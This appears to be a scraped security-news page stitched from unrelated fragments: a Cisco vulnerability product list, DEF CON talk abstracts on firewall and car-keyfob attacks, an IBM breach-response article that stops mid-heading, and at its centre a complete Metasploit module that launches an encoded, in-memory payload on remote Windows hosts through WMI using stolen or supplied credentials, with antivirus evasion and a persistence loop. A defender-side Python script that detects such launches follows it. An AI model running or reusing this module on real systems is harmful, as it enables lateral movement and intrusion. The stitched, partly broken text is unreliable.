Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified SIP Proxy Software 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco onePK All-in-One Virtual Machine 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0

Not Vulnerable:
Pexip Pexip Infinity 13
Oracle VM VirtualBox 5.1.8
Oracle VM VirtualBox 5.0.28
OpenSSL Project OpenSSL 1.1
OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u
IBM Sterling Connect:Express for UNIX 1.5.0.13 iFix 150-13
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4
IBM BigFix Remote Control 9.1.3
Cisco Wireless Lan Controller 8.4
Cisco WebEx Meetings Server 2.6.1.30
Cisco WebEx Meetings for Windows Phone 8 2.8
Cisco WebEx Meetings Client - On-Premises T32
Cisco WebEx Meetings Client - Hosted T32
Cisco WebEx Centers T32
Cisco Virtualization Experience Media Edition 11.8
Cisco Virtual Security Gateway 2.1.6
Cisco Videoscape AnyRes Live 9.7.2
Cisco Video Surveillance PTZ IP Cameras 2.9
Cisco Video Surveillance 7000 Series IP Cameras 2.9
Cisco Video Surveillance 6000 Series IP Cameras 2.9
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 2.9
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 2.9
Cisco Video Surveillance 3000 Series IP Cameras 2.9
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 4.003(002)
Cisco Universal Small Cell Iuh 3.17.3
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 3.17.3
Cisco Universal Small Cell 7000 Series 3.5.12.23
Cisco Universal Small Cell 5000 Series 3.5.12.23
Cisco Unity Express 10
Cisco Unified Workforce Optimization - Quality Management Solution 11.5(1)SU1
Cisco Unified SIP Proxy Software 10
Cisco Unified MeetingPlace 8.6MR1
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 9.3(4)SR3
Cisco Unified IP 8831 Conference Phone 10.3.1SR4
Cisco Unified IP 6901 Phone 9.3(1)SR3
Cisco Unified Intelligent Contact Management Enterprise 11.6.1
Cisco Unified Intelligence Center 11.6(1)
Cisco Unified Contact Center Express 11.6
Cisco Unified Contact Center Enterprise 11.6.1
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 3.0
Cisco UCS B-Series Blade Servers 3.1.3
Cisco UC Integration for Microsoft Lync 11.6.3
Cisco TelePresence Video Communication Server (VCS) X8.8.3
Cisco TelePresence TX9000 Series 6.1
Cisco TelePresence System TX1310 6.1
Cisco TelePresence System EX Series TC7.3.7
Cisco TelePresence System EX Series CE8.2.2
Cisco Telepresence System 500-37 6.1
Cisco Telepresence System 500-32 6.1
Cisco TelePresence System 3000 Series 6.1
Cisco Telepresence System 1300 6.1
Cisco Telepresence System 1100 6.1
Cisco Telepresence System 1000 6.1
Cisco TelePresence SX Series TC7.3.7
Cisco TelePresence SX Series CE8.2.2
Cisco TelePresence Server on Multiparty Media 820 4.4
Cisco TelePresence Server on Multiparty Media 310 and 320 4.4
Cisco TelePresence Server 7010 and MSE 8710 4.4
Cisco TelePresence Profile Series TC7.3.7
Cisco TelePresence Profile Series CE8.2.2
Cisco TelePresence MX Series TC7.3.7
Cisco TelePresence MX Series CE8.2.2
Cisco TelePresence MCU 4.5(1.89)
Cisco TelePresence Integrator C Series TC7.3.7
Cisco TelePresence Integrator C Series CE8.2.2
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 1.4.2
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 1.4.2
Cisco SPA112 2-Port Phone Adapter 1.4.2
Cisco Services Provisioning Platform SFP1.1
Cisco Security Manager 4.13
Cisco Secure Access Control System (ACS) 5.8.0.32.8
Cisco Secure Access Control System (ACS) 5.8.0.32.7
Cisco Prime Performance Manager 1.7 SP1611
Cisco Prime Network Services Controller 1.01u
Cisco Prime Network Registrar 8.3.5
Cisco Prime Network Registrar 9.0
Cisco Prime Network 431
Cisco Prime Infrastructure 3.2
Cisco Prime Collaboration Provisioning 11.6
Cisco Prime Collaboration Assurance 11.6
Cisco ONS 15454 Series Multiservice Provisioning Platforms 10.7
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 7.0(3)I5(1)
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 6.2.19
Cisco Nexus 7000 Series Switches 5.2.8(i)
Cisco Nexus 6000 Series Switches 6.2.19
Cisco Nexus 6000 Series Switches 5.2.8(i)
Cisco Nexus 5000 Series Switches 6.2.19
Cisco Nexus 5000 Series Switches 5.2.8(i)
Cisco Nexus 4000 Series Blade Switches 4.1(2)E1(1r)
Cisco Nexus 1000V Series Switches 5.2(1)SV3(2.5)
Cisco Network Analysis Module 6.2(2)
Cisco Network Analysis Module 6.2(1-b)
Cisco NetFlow Generation Appliance 1.1(1)
Cisco MDS 9000 Series Multilayer Switches 6.2.19
Cisco MDS 9000 Series Multilayer Switches 5.2.8(i)
Cisco Jabber Software Development Kit 11.8
Cisco Jabber Guest 11
Cisco Jabber for Windows 11.8
Cisco Jabber for Mac 11.8
Cisco Jabber for iPhone and iPad 11.8
Cisco Jabber for Android 11.8
Cisco Jabber Client Framework (JCF) Components 11.8
Cisco IP Interoperability and Collaboration System (IPICS) 5.0(1)
Cisco IOS and Cisco IOS XE Software 16.4
Cisco IOS and Cisco IOS XE Software 16.3
Cisco IOS and Cisco IOS XE Software 16.2
Cisco IOS and Cisco IOS XE Software 16.1
Cisco IOS and Cisco IOS XE Software 15.5(3)
Cisco FireSIGHT System Software 6.1.0.1
Cisco FireSIGHT System Software 6.0.1.3
Cisco FireSIGHT System Software 5.4.1.9
Cisco FireSIGHT System Software 5.4.0.10
Cisco Expressway series X8.8.3
Cisco Enterprise Content Delivery System (ECDS) 2.6.9
Cisco Email Security Appliance (ESA) 10.0.1
Cisco Edge 340 Digital Media Player 1.2RB1.0.3
Cisco Edge 300 Digital Media Player 1.6RB5
Cisco Digital Media Manager 5.4.1_RB4
Cisco Digital Media Manager 5.3.6_RB3
Cisco DCM Series D9900 Digital Content Manager 0
Cisco Content Security Management Appliance (SMA) 6.1.140
Cisco Connected Grid Routers 15.8.9
Cisco Connected Grid Routers 7.3
Cisco Computer Telephony Integration Object Server (CTIOS) 11.6.1
Cisco Common Services Platform Collector 1.11
Cisco ATA 190 Series Analog Terminal Adaptors 1.3
Cisco ASR 5000 Series 21.2
Cisco ASA Next-Generation Firewall Services 2.1.2
Cisco Application Policy Infrastructure Controller (APIC) 2.2(1)
Cisco AnyConnect Secure Mobility Client for Windows 4.0.7
Cisco AnyConnect Secure Mobility Client for Mac OS X 4.0.7
Cisco AnyConnect Secure Mobility Client for Linux 4.0.7
Cisco AnyConnect Secure Mobility Client for iOS 4.0.7
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.3.4
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.4
Cisco AnyConnect Secure Mobility Client for Android 4.0.7
Cisco Aironet 2700 Series Access Points 16.4
Cisco Aironet 2700 Series Access Points 16.3
Cisco Aironet 2700 Series Access Points 16.2
Cisco Aironet 2700 Series Access Points 16.1
Cisco Aironet 2700 Series Access Points 15.5(3)
Cisco 910 Industrial Router 1.2.1RB4
Cisco 4400 Series Digital Media Players 5.4.1_RB4
Cisco 4400 Series Digital Media Players 5.3.6_RB3
Cisco 4300 Series Digital Media Players 5.4.1_RB4
Cisco 4300 Series Digital Media Players 5.3.6_RB3


SecurityFocus Vulnerabilities


Threatpost | The first stop for security news

Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail Though briefly touching on generic firewall bypass techniques, this talk will largely focus on the kernel-mode vulnerability. Specifically, I’ll discuss bypassing OS X specific anti-debugging mechanisms employed by the product, reverse-engineering the firewall's I/O Kit kernel interfaces and 'authentication' mechanisms, and the discovery of the exploitable heap-overflow.

Finally, methods of exploitation will be briefly discussed, including how an Apple kernel fix made this previously un-exploitable bug exploitable on OS X 10.11.

So if you simply want to see yet another 'security' product fall, or more generically, learn methods of OS X kernel extension reversing in a practical manner, then this talk is for you 🙂

Bio:
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools. Both can be found on his website; www.Objective-See.com


DEF CON Announcements!

Gary Numan said it best. Cars. They’re everywhere. You can hardly drive down a busy freeway without seeing one. But what about their security?

In this talk I’ll reveal new research and real attacks in the area of wirelessly controlled gates, garages, and cars. Many cars are now controlled from mobile devices over GSM, while even more can be unlocked and ignitions started from wireless keyfobs over RF. All of these are subject to attack with low-cost tools (such as RTL-SDR, GNU Radio, HackRF, Arduino, and even a Mattel toy).

We will investigate how these features work, and of course, how they can be exploited. I will be releasing new tools and vulnerabilities in this area, such as key-space reduction attacks on fixed-codes, advanced "code grabbers" using RF attacks on encrypted and rolling codes, and how to protect yourself against such issues.

By the end of this talk you’ll understand not only how vehicles and the wirelessly-controlled physical access protecting them can be exploited, but also learn about various tools for car and RF research, as well as how to use and build your own inexpensive devices for such investigation.

Ladies and gentlemen, start your engines. And other people’s engines.

Samy Kamkar is a security researcher, best known for creating The MySpace Worm, one of the fastest spreading viruses of all time. He (attempts to) illustrate terrifying vulnerabilities with playfulness, and his exploits have been branded:

“Controversial”, -The Wall Street Journal
“Horrific”, -The New York Times
“Now I want to fill my USB ports up with cement”, -Gizmodo

He’s demonstrated usurping typical hardware for surreptitious means such as with KeySweeper, turning a standard USB wall charger into a covert, wireless keyboard sniffer, and SkyJack, a custom drone which takes over any other nearby drones allowing them to be controlled as a massive zombie swarm. He’s exposed issues around privacy, such as by developing the Evercookie which appeared in a top-secret NSA document revealed by Edward Snowden, exemplifying techniques used by governments and corporations for clandestine web tracking, and has discovered and released research around the illicit GPS and location tracking performed by Apple, Google and Microsoft mobile devices. He continues to produce new research and tools for the public as open source and open hardware.

Twitter: @samykamkar


DEF CON Announcements!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/powershell'
require 'msf/core/post/windows/priv'
require 'msf/core/exploit/powershell/dot_net'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Powershell
  include Msf::Exploit::Powershell::DotNet
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Authenticated WMI Exec via Powershell",
      'Description'    => %q{
        This module uses WMI execution to launch a payload instance on a remote machine.
        In order to avoid AV detection, all execution is performed in memory via psh-net
        encoded payload. Persistence option can be set to keep the payload looping while
        a handler is present to receive it. By default the module runs as the current
        process owner. The module can be configured with credentials for the remote host
        with which to launch the process.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'RageLtMan <rageltman[at]sempervictus>',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        => { 'Space' => 8192 },
      'Platform'       => [ 'windows' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [ [ 'Universal', {} ] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => "Aug 19 2012"
    ))

    register_options(
      [
        OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
        OptString.new('USERNAME', [false, "Username to authenticate as"]),
        OptString.new('PASSWORD', [false, "Password to authenticate with"]),
        OptString.new('DOMAIN', [false, "Domain or machine name"]),
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
        OptBool.new('RunRemoteWow64', [
          false,
          'Execute powershell in 32bit compatibility mode, payloads need native arch',
          false
        ]),
      ], self.class)
  end

  # Assemble the PowerShell script that is handed to psh_exec: the WMI wrapper
  # function followed by one New-RemoteProcess call per target host.
  def build_script
    run_opts = {}
    run_opts[:username] = datastore['USERNAME']
    run_opts[:domain]   = datastore['DOMAIN'] || '.'
    run_opts[:password] = datastore['PASSWORD']

    # End of file marker
    eof = Rex::Text.rand_text_alpha(8)
    env_suffix = Rex::Text.rand_text_alpha(8)

    # Create base64 encoded payload
    psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
    if datastore['PowerShellPersist']
      fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
      sleep_time = rand(5) + 5
      psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
    end
    psh_payload = compress_script(psh_payload_raw, eof)
    # WMI exec function - this is going into powershell.rb after pull 701 is committed
    script = ps_wmi_exec(run_opts)
    # Build WMI exec calls to every host into the script to reduce PS instances
    # Need to address arch compat issue here, check powershell.exe arch, check pay arch
    # split the hosts into wow64 and native, and run each range separately
    ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
    # for whatever reason, passing %systemroot% instead of 'C:\windows' fails

    if datastore["RHOSTS"]
      # Iterate through our hosts list adding a call to the WMI wrapper for each.
      # This should learn to differentiate between hosts and call WOW64 as appropriate,
      # as well as putting the payload into a variable when many hosts are hit so the
      # uploaded script is not bloated since each encoded payload is bulky.
      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
        if run_opts[:username] and run_opts[:password]
          script << " New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
          script << " -pass '#{run_opts[:password]}' -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
        else
          script << " New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
        end
      end
    else
      print_status('Running Locally')
      script = psh_payload_raw
    end
    return script
  end

  def exploit
    # Make sure we meet the requirements before running the script
    unless have_powershell?
      fail_with(Failure::BadConfig, 'PowerShell not found')
    end

    # SYSTEM doesn't have credentials on remote hosts
    if is_system? and datastore['RHOSTS']
      print_error("Cannot run as local system on remote hosts")
      return 0
    end

    script = build_script

    if datastore['Powershell::Post::dry_run']
      print_good script
      return
    end

    begin
      psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script, true, false)
      print_good(psh_output)
    rescue Rex::TimeoutError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    vprint_good('PSH WMI exec is complete.')
  end

  # Wrapper function for instantiating a WMI win32_process
  # class object in powershell.
  # Instantiates the [wmiclass] object and configures the scope
  # Sets impersonation level and injects credentials as needed
  # Configures application startup options to hide the newly
  # created window. Adds start-up check for remote proc.
  # The heredocs are single-quoted so the PowerShell text is emitted verbatim
  # (no Ruby interpolation, backslashes untouched).
  def ps_wmi_exec(opts = {})

    ps_wrapper = <<'EOS'
Function New-RemoteProcess {
Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
$ErrorActionPreference="SilentlyContinue"
$proc = [WMIClass]"\\$rhost\root\cimv2:Win32_Process"
EOS
    if opts[:username] and opts[:password]
      ps_wrapper += <<'EOS'
$proc.psbase.Scope.Options.userName = $login
$proc.psbase.Scope.Options.Password = $pass
EOS
    end
    ps_wrapper += <<'EOS'
$proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
$proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
$startup = [wmiclass]"Win32_ProcessStartup"
$startup.Properties['ShowWindow'].value=$False
$remote = $proc.Create($cmd,'C:\',$startup)
if ($remote.returnvalue -eq 0) {
Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
} else {
Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
}
}
EOS

    return ps_wrapper
  end

end

#
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
#
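The module above creates its remote process through Win32_Process.Create and runs `powershell.exe -EncodedCommand <base64>` inside it (or, with RunRemoteWow64, `cmd /c ...\syswow64\...\powershell.exe -EncodedCommand <base64>`). On the target that leaves a characteristic process-creation trace: a child of the WMI provider host WmiPrvSE.exe whose command line carries PowerShell with an encoded command, which is base64 of the script as UTF-16LE text. The following Python is an added defender-side example, not part of the Packet Storm listing or of Metasploit: it runs that check over a few constructed process-creation records (the record fields, host names and sample command lines are all constructed for this illustration) and decodes the encoded command so an analyst can see what was launched.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcRecord:
    """One process-creation event (Sysmon ID 1 / Security 4688 style).
    Field names are an assumption for this example, not a real schema."""
    host: str
    parent_image: str
    image: str
    command_line: str


# WMI-initiated processes are spawned by the provider host, not by a user shell.
WMI_HOST_PROCESS = "wmiprvse.exe"

# powershell / powershell.exe as a standalone token (avoids matching the
# "WindowsPowerShell" directory name on its own).
POWERSHELL_RE = re.compile(r"(^|[\\\s])powershell(\.exe)?\b", re.IGNORECASE)

# -EncodedCommand and the unambiguous prefixes PowerShell accepts for it,
# followed by the base64 blob.
ENCODED_FLAG_RE = re.compile(
    r"-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def encode_command(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Invert encode_command; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_wmi_spawned_encoded_powershell(rec: ProcRecord) -> bool:
    """True when WmiPrvSE.exe spawned a command line that runs encoded PowerShell.
    Matching on the command line (not the image) also catches the cmd /c
    WOW64 launch, where cmd.exe is the direct child of WmiPrvSE.exe."""
    parent = rec.parent_image.rsplit("\\", 1)[-1].lower()
    if parent != WMI_HOST_PROCESS:
        return False
    if not POWERSHELL_RE.search(rec.command_line):
        return False
    return ENCODED_FLAG_RE.search(rec.command_line) is not None


def triage(records: List[ProcRecord]) -> List[dict]:
    """Return one finding per matching record, with the decoded script."""
    findings = []
    for rec in records:
        if not is_wmi_spawned_encoded_powershell(rec):
            continue
        m = ENCODED_FLAG_RE.search(rec.command_line)
        findings.append({
            "host": rec.host,
            "image": rec.image,
            "decoded_script": decode_encoded_command(m.group(2)),
        })
    return findings


# Constructed sample telemetry: two WMI launches (native and WOW64 path),
# one interactive encoded launch, one WMI launch without an encoded command.
SAMPLE_RECORDS = [
    ProcRecord("ws01", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "powershell.exe -EncodedCommand " + encode_command("Write-Host 'stage one'")),
    ProcRecord("ws02", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"C:\Windows\System32\cmd.exe",
               r"cmd /c C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -enc "
               + encode_command("Start-Sleep -s 5")),
    ProcRecord("ws03", r"C:\Windows\explorer.exe",
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "powershell.exe -EncodedCommand " + encode_command("Get-Date")),
    ProcRecord("ws04", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"powershell.exe -File C:\ops\inventory.ps1"),
]


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f['host']}: encoded PowerShell under WmiPrvSE.exe via {f['image']}: "
              f"{f['decoded_script']!r}")
```

Two caveats when turning this into a production rule: the rule keys on the encoded-command flag, so a WMI-spawned PowerShell launched with `-File` or an inline `-Command` (record ws04 above) is deliberately not flagged and needs its own rule, and legitimate management tooling (SCCM, monitoring agents) also spawns children of WmiPrvSE.exe, so the parent relationship alone is a weak signal; the encoded command plus a decoded script that loads an assembly from memory is what justifies escalation.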


Exploit Files ≈ Packet Storm

You are driving in your car with your 10-year-old son in the passenger’s seat. A ball bounces in front of your car and you hit the brakes hard while simultaneously throwing your arm in front of the child, acting almost automatically. That’s called muscle memory, and it is a big part of what organizations need when responding to cyberattacks.

Cyberattack Defense Is Muscle Memory

When asked how to launch an effective cyberattack defense effort, most people give technology-related answers: Beef up the firewalls, fortify the network, and deploy better intrusion detection and security analytics solutions.

While technology is certainly important, the responses coming from your organization during and following the attack — the human side of the equation — are even more vital. Yet despite a wealth of good advice, I estimate that in 8 of the last 10 large-scale breaches, the response from the organization under attack did as much or more damage than the attack itself. Most of that damage was reputational.

Why is that? Very few C-level executives have been trained in crisis leadership. They seldom have to make urgent decisions in near-real time. The usual practice is to build a team around executives to provide input. They carefully study these inputs and weigh them against other information to develop a set of options. Eventually, they fashion a response. This could happen days or weeks later — or, in some cases, not at all.

The Worst Response Is No Response

That explains why the response to a major breach is so often little or no response at all. Often the blame is directed at some vague state-sponsored source when, in reality, the company has no legitimate suspects because attribution is very difficult. That’s when problems arise beyond the actual damage from the breach. Customers worry about their personal information. Suppliers and partners get antsy. Tort lawyers start to circle overhead. Confidence in the organization drops while suspicion mounts.

Almost all of this post-attack damage is avoidable and unnecessary. First, all organizations must presume that they will fall victim to a major breach at some point. There is no safe harbor, as should be evident to anyone listening to the news these days.

Second, the management team needs in-depth training in crisis management so that it is ready when an attack does happen. This team needs to prepare and rehearse responses for customers, suppliers, regulators, the media and the board. Of the 50 states in the U.S., for example, 47 have their own unique breach disclosure laws. You must develop, in advance, a plan that complies with the laws of each state in which you do business. These responses must be ingrained as executive muscle memory.

Filling the Gaps

To help IT professionals thoroughly prepare to deal with cyberattacks, IBM opened its X-Force Command Center (XFCC), a simulator designed to train executives in the crisis leadership skills they’ll need to respond to a breach. In the all-day course at the XFCC, teams will first experience a highly realistic, simulated cyberattack. They’ll be exposed to the variety of ways the technical staff tries to detect and stop the attack and then swing into recovery mode.

Participants will spend the second half of the day planning the proper response steps and rehearsing them. The central idea is to infuse executives with the confidence and experience of doing something that their MBA training and business experience likely failed to address. Leadership during a cyberattack defense effort requires a full-throttle response in hours, not days or weeks.


A Predetermined, Definitive Response

